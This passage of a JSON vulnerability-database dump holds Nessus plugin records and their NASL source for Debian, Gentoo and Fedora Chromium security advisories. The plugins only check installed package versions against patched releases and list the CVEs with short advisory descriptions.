"CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190", "CVE-2021-21191", "CVE-2021-21192", "CVE-2021-21193", "CVE-2021-21194", "CVE-2021-21195", "CVE-2021-21196", "CVE-2021-21197", "CVE-2021-21198", "CVE-2021-21199"], "modified": "2022-01-24T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:chromium", "cpe:/o:debian:debian_linux:10.0"], "id": "DEBIAN_DSA-4886.NASL", "href": "https://www.tenable.com/plugins/nessus/148364", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4886. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(148364);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/24\");\n\n script_cve_id(\"CVE-2021-21159\", \"CVE-2021-21160\", \"CVE-2021-21161\", \"CVE-2021-21162\", \"CVE-2021-21163\", \"CVE-2021-21165\", \"CVE-2021-21166\", \"CVE-2021-21167\", \"CVE-2021-21168\", \"CVE-2021-21169\", \"CVE-2021-21170\", \"CVE-2021-21171\", \"CVE-2021-21172\", \"CVE-2021-21173\", \"CVE-2021-21174\", \"CVE-2021-21175\", \"CVE-2021-21176\", \"CVE-2021-21177\", \"CVE-2021-21178\", \"CVE-2021-21179\", \"CVE-2021-21180\", \"CVE-2021-21181\", \"CVE-2021-21182\", \"CVE-2021-21183\", \"CVE-2021-21184\", \"CVE-2021-21185\", \"CVE-2021-21186\", \"CVE-2021-21187\", \"CVE-2021-21188\", \"CVE-2021-21189\", \"CVE-2021-21190\", \"CVE-2021-21191\", \"CVE-2021-21192\", \"CVE-2021-21193\", \"CVE-2021-21194\", \"CVE-2021-21195\", \"CVE-2021-21196\", \"CVE-2021-21197\", \"CVE-2021-21198\", \"CVE-2021-21199\");\n script_xref(name:\"DSA\", value:\"4886\");\n script_xref(name:\"IAVA\", value:\"2021-A-0152-S\");\n 
script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Debian DSA-4886-1 : chromium - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Several vulnerabilites have been discovered in the chromium web\nbrowser.\n\n - CVE-2021-21159\n Khalil Zhani discovered a buffer overflow issue in the\n tab implementation.\n\n - CVE-2021-21160\n Marcin Noga discovered a buffer overflow issue in\n WebAudio.\n\n - CVE-2021-21161\n Khalil Zhani discovered a buffer overflow issue in the\n tab implementation.\n\n - CVE-2021-21162\n A use-after-free issue was discovered in the WebRTC\n implementation.\n\n - CVE-2021-21163\n Alison Huffman discovered a data validation issue.\n\n - CVE-2021-21165\n Alison Huffman discovered an error in the audio\n implementation.\n\n - CVE-2021-21166\n Alison Huffman discovered an error in the audio\n implementation.\n\n - CVE-2021-21167\n Leecraso and Guang Gong discovered a use-after-free\n issue in the bookmarks implementation.\n\n - CVE-2021-21168\n Luan Herrera discovered a policy enforcement error in\n the appcache.\n\n - CVE-2021-21169\n Bohan Liu and Moon Liang discovered an out-of-bounds\n access issue in the v8 JavaScript library.\n\n - CVE-2021-21170\n David Erceg discovered a user interface error.\n\n - CVE-2021-21171\n Irvan Kurniawan discovered a user interface error.\n\n - CVE-2021-21172\n Maciej Pulikowski discovered a policy enforcement error\n in the File System API.\n\n - CVE-2021-21173\n Tom Van Goethem discovered a network based information\n leak.\n\n - CVE-2021-21174\n Ashish Guatam Kambled discovered an implementation error\n in the Referrer policy.\n\n - CVE-2021-21175\n Jun Kokatsu discovered an implementation error in the\n Site Isolation feature.\n\n - 
CVE-2021-21176\n Luan Herrera discovered an implementation error in the\n full screen mode.\n\n - CVE-2021-21177\n Abdulrahman Alqabandi discovered a policy enforcement\n error in the Autofill feature.\n\n - CVE-2021-21178\n Japong discovered an error in the Compositor\n implementation.\n\n - CVE-2021-21179\n A use-after-free issue was discovered in the networking\n implementation.\n\n - CVE-2021-21180\n Abdulrahman Alqabandi discovered a use-after-free issue\n in the tab search feature.\n\n - CVE-2021-21181\n Xu Lin, Panagiotis Ilias, and Jason Polakis discovered a\n side-channel information leak in the Autofill feature.\n\n - CVE-2021-21182\n Luan Herrera discovered a policy enforcement error in\n the site navigation implementation.\n\n - CVE-2021-21183\n Takashi Yoneuchi discovered an implementation error in\n the Performance API.\n\n - CVE-2021-21184\n James Hartig discovered an implementation error in the\n Performance API.\n\n - CVE-2021-21185\n David Erceg discovered a policy enforcement error in\n Extensions.\n\n - CVE-2021-21186\n dhirajkumarnifty discovered a policy enforcement error\n in the QR scan implementation.\n\n - CVE-2021-21187\n Kirtikumar Anandrao Ramchandani discovered a data\n validation error in URL formatting.\n\n - CVE-2021-21188\n Woojin Oh discovered a use-after-free issue in\n Blink/Webkit.\n\n - CVE-2021-21189\n Khalil Zhani discovered a policy enforcement error in\n the Payments implementation.\n\n - CVE-2021-21190\n Zhou Aiting discovered use of uninitialized memory in\n the pdfium library.\n\n - CVE-2021-21191\n raven discovered a use-after-free issue in the WebRTC\n implementation.\n\n - CVE-2021-21192\n Abdulrahman Alqabandi discovered a buffer overflow issue\n in the tab implementation.\n\n - CVE-2021-21193\n A use-after-free issue was discovered in Blink/Webkit.\n\n - CVE-2021-21194\n Leecraso and Guang Gong discovered a use-after-free\n issue in the screen capture feature.\n\n - CVE-2021-21195\n Liu and Liang discovered a 
use-after-free issue in the\n v8 JavaScript library.\n\n - CVE-2021-21196\n Khalil Zhani discovered a buffer overflow issue in the\n tab implementation.\n\n - CVE-2021-21197\n Abdulrahman Alqabandi discovered a buffer overflow issue\n in the tab implementation.\n\n - CVE-2021-21198\n Mark Brand discovered an out-of-bounds read issue in the\n Inter-Process Communication implementation.\n\n - CVE-2021-21199\n Weipeng Jiang discovered a use-after-free issue in the\n Aura window and event manager.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21159\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21160\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21161\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21162\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21163\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21165\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21166\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21167\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21168\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21169\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21170\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://security-tracker.debian.org/tracker/CVE-2021-21171\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21172\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21173\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21174\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21175\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21176\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21177\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21178\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21179\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21180\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21181\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21182\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21183\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21184\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21185\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21186\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21187\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21188\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21189\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21190\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21191\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21192\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21193\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21194\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21195\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21196\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21197\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21198\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2021-21199\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/chromium\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/buster/chromium\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2021/dsa-4886\"\n );\n 
script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the chromium packages.\n\nFor the stable distribution (buster), these problems have been fixed\nin version 89.0.4389.114-1~deb10u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21199\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"10.0\", prefix:\"chromium\", reference:\"89.0.4389.114-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-common\", reference:\"89.0.4389.114-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-driver\", reference:\"89.0.4389.114-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-l10n\", reference:\"89.0.4389.114-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-sandbox\", reference:\"89.0.4389.114-1~deb10u1\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"chromium-shell\", reference:\"89.0.4389.114-1~deb10u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:49:22", "description": "The remote host is affected by the vulnerability described in GLSA-202104-08 (Chromium, Google Chrome: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Chromium and Google Chrome. 
Please review the CVE identifiers referenced below for details.\n Impact :\n\n Please review the referenced CVE identifiers for details.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-05-03T00:00:00", "type": "nessus", "title": "GLSA-202104-08 : Chromium, Google Chrome: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21142", "CVE-2021-21143", "CVE-2021-21144", "CVE-2021-21145", "CVE-2021-21146", "CVE-2021-21147", "CVE-2021-21148", "CVE-2021-21149", "CVE-2021-21150", "CVE-2021-21151", "CVE-2021-21152", "CVE-2021-21153", "CVE-2021-21154", "CVE-2021-21155", "CVE-2021-21156", "CVE-2021-21157", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", 
"CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-2119", "CVE-2021-21191", "CVE-2021-21192", "CVE-2021-21193", "CVE-2021-21194", "CVE-2021-21195", "CVE-2021-21196", "CVE-2021-21197", "CVE-2021-21198", "CVE-2021-21199", "CVE-2021-21201", "CVE-2021-21202", "CVE-2021-21203", "CVE-2021-21204", "CVE-2021-21205", "CVE-2021-21206", "CVE-2021-21207", "CVE-2021-21208", "CVE-2021-21209", "CVE-2021-21210", "CVE-2021-21211", "CVE-2021-21212", "CVE-2021-21213", "CVE-2021-21214", "CVE-2021-21215", "CVE-2021-21216", "CVE-2021-21217", "CVE-2021-21218", "CVE-2021-21219", "CVE-2021-21220", "CVE-2021-21221", "CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226", "CVE-2021-21227", "CVE-2021-21228", "CVE-2021-21229", "CVE-2021-21230", "CVE-2021-21231", "CVE-2021-21232", "CVE-2021-21233"], "modified": "2022-12-07T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:chromium", "p-cpe:/a:gentoo:linux:google-chrome", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-202104-08.NASL", "href": "https://www.tenable.com/plugins/nessus/149223", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 202104-08.\n#\n# The advisory text is Copyright (C) 2001-2022 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(149223);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\"CVE-2021-21142\", \"CVE-2021-21143\", \"CVE-2021-21144\", \"CVE-2021-21145\", \"CVE-2021-21146\", \"CVE-2021-21147\", \"CVE-2021-21148\", \"CVE-2021-21149\", \"CVE-2021-21150\", \"CVE-2021-21151\", \"CVE-2021-21152\", \"CVE-2021-21153\", \"CVE-2021-21154\", \"CVE-2021-21155\", \"CVE-2021-21156\", \"CVE-2021-21157\", \"CVE-2021-21159\", \"CVE-2021-21160\", \"CVE-2021-21161\", \"CVE-2021-21162\", \"CVE-2021-21163\", \"CVE-2021-21165\", \"CVE-2021-21166\", \"CVE-2021-21167\", \"CVE-2021-21168\", \"CVE-2021-21169\", \"CVE-2021-21170\", \"CVE-2021-21171\", \"CVE-2021-21172\", \"CVE-2021-21173\", \"CVE-2021-21174\", \"CVE-2021-21175\", \"CVE-2021-21176\", \"CVE-2021-21177\", \"CVE-2021-21178\", \"CVE-2021-21179\", \"CVE-2021-21180\", \"CVE-2021-21181\", \"CVE-2021-21182\", \"CVE-2021-21183\", \"CVE-2021-21184\", \"CVE-2021-21185\", \"CVE-2021-21186\", \"CVE-2021-21187\", \"CVE-2021-21188\", \"CVE-2021-21189\", \"CVE-2021-2119\", \"CVE-2021-21191\", \"CVE-2021-21192\", \"CVE-2021-21193\", \"CVE-2021-21194\", \"CVE-2021-21195\", \"CVE-2021-21196\", \"CVE-2021-21197\", \"CVE-2021-21198\", \"CVE-2021-21199\", \"CVE-2021-21201\", \"CVE-2021-21202\", \"CVE-2021-21203\", \"CVE-2021-21204\", \"CVE-2021-21205\", \"CVE-2021-21206\", \"CVE-2021-21207\", \"CVE-2021-21208\", \"CVE-2021-21209\", \"CVE-2021-21210\", \"CVE-2021-21211\", \"CVE-2021-21212\", \"CVE-2021-21213\", \"CVE-2021-21214\", \"CVE-2021-21215\", \"CVE-2021-21216\", \"CVE-2021-21217\", \"CVE-2021-21218\", \"CVE-2021-21219\", \"CVE-2021-21220\", \"CVE-2021-21221\", \"CVE-2021-21222\", \"CVE-2021-21223\", \"CVE-2021-21224\", \"CVE-2021-21225\", \"CVE-2021-21226\", \"CVE-2021-21227\", \"CVE-2021-21228\", \"CVE-2021-21229\", 
\"CVE-2021-21230\", \"CVE-2021-21231\", \"CVE-2021-21232\", \"CVE-2021-21233\");\n script_xref(name:\"GLSA\", value:\"202104-08\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0007\");\n\n script_name(english:\"GLSA-202104-08 : Chromium, Google Chrome: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-202104-08\n(Chromium, Google Chrome: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Chromium and Google\n Chrome. Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n Please review the referenced CVE identifiers for details.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/202104-08\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All Chromium users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-client/chromium-90.0.4430.93'\n All Google Chrome users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-client/google-chrome-90.0.4430.93'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21233\");\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome versions before 89.0.4389.128 V8 XOR Typer Out-Of-Bounds Access RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:google-chrome\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/chromium\", unaffected:make_list(\"ge 90.0.4430.93\"), vulnerable:make_list(\"lt 90.0.4430.93\"))) flag++;\nif (qpkg_check(package:\"www-client/google-chrome\", unaffected:make_list(\"ge 90.0.4430.93\"), vulnerable:make_list(\"lt 90.0.4430.93\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Chromium / Google Chrome\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:33:37", "description": "Update chromium to 78.0.3904.87. Fixes CVE-2019-13720 and CVE-2019-13721 \n\n----\n\nChromium 78. 
\n\nFixes these: CVE-2019-5870 CVE-2019-5871 CVE-2019-5872 CVE-2019-5874 CVE-2019-5875 CVE-2019-13691 CVE-2019-13692 CVE-2019-5876 CVE-2019-5877 CVE-2019-5878 CVE-2019-5879 CVE-2019-5880 CVE-2019-5881 CVE-2019-13659 CVE-2019-13660 CVE-2019-13661 CVE-2019-13662 CVE-2019-13663 CVE-2019-13664 CVE-2019-13665 CVE-2019-13666 CVE-2019-13667 CVE-2019-13668 CVE-2019-13669 CVE-2019-13670 CVE-2019-13671 CVE-2019-13673 CVE-2019-13674 CVE-2019-13675 CVE-2019-13676 CVE-2019-13677 CVE-2019-13678 CVE-2019-13679 CVE-2019-13680 CVE-2019-13681 CVE-2019-13682 CVE-2019-13683\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2019-11-15T00:00:00", "type": "nessus", "title": "Fedora 30 : chromium (2019-2fa7552273)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13659", "CVE-2019-13660", "CVE-2019-13661", "CVE-2019-13662", "CVE-2019-13663", "CVE-2019-13664", 
"CVE-2019-13665", "CVE-2019-13666", "CVE-2019-13667", "CVE-2019-13668", "CVE-2019-13669", "CVE-2019-13670", "CVE-2019-13671", "CVE-2019-13673", "CVE-2019-13674", "CVE-2019-13675", "CVE-2019-13676", "CVE-2019-13677", "CVE-2019-13678", "CVE-2019-13679", "CVE-2019-13680", "CVE-2019-13681", "CVE-2019-13682", "CVE-2019-13683", "CVE-2019-13691", "CVE-2019-13692", "CVE-2019-13720", "CVE-2019-13721", "CVE-2019-5870", "CVE-2019-5871", "CVE-2019-5872", "CVE-2019-5874", "CVE-2019-5875", "CVE-2019-5876", "CVE-2019-5877", "CVE-2019-5878", "CVE-2019-5879", "CVE-2019-5880", "CVE-2019-5881"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:chromium", "cpe:/o:fedoraproject:fedora:30"], "id": "FEDORA_2019-2FA7552273.NASL", "href": "https://www.tenable.com/plugins/nessus/131037", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-2fa7552273.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(131037);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-13659\", \"CVE-2019-13660\", \"CVE-2019-13661\", \"CVE-2019-13662\", \"CVE-2019-13663\", \"CVE-2019-13664\", \"CVE-2019-13665\", \"CVE-2019-13666\", \"CVE-2019-13667\", 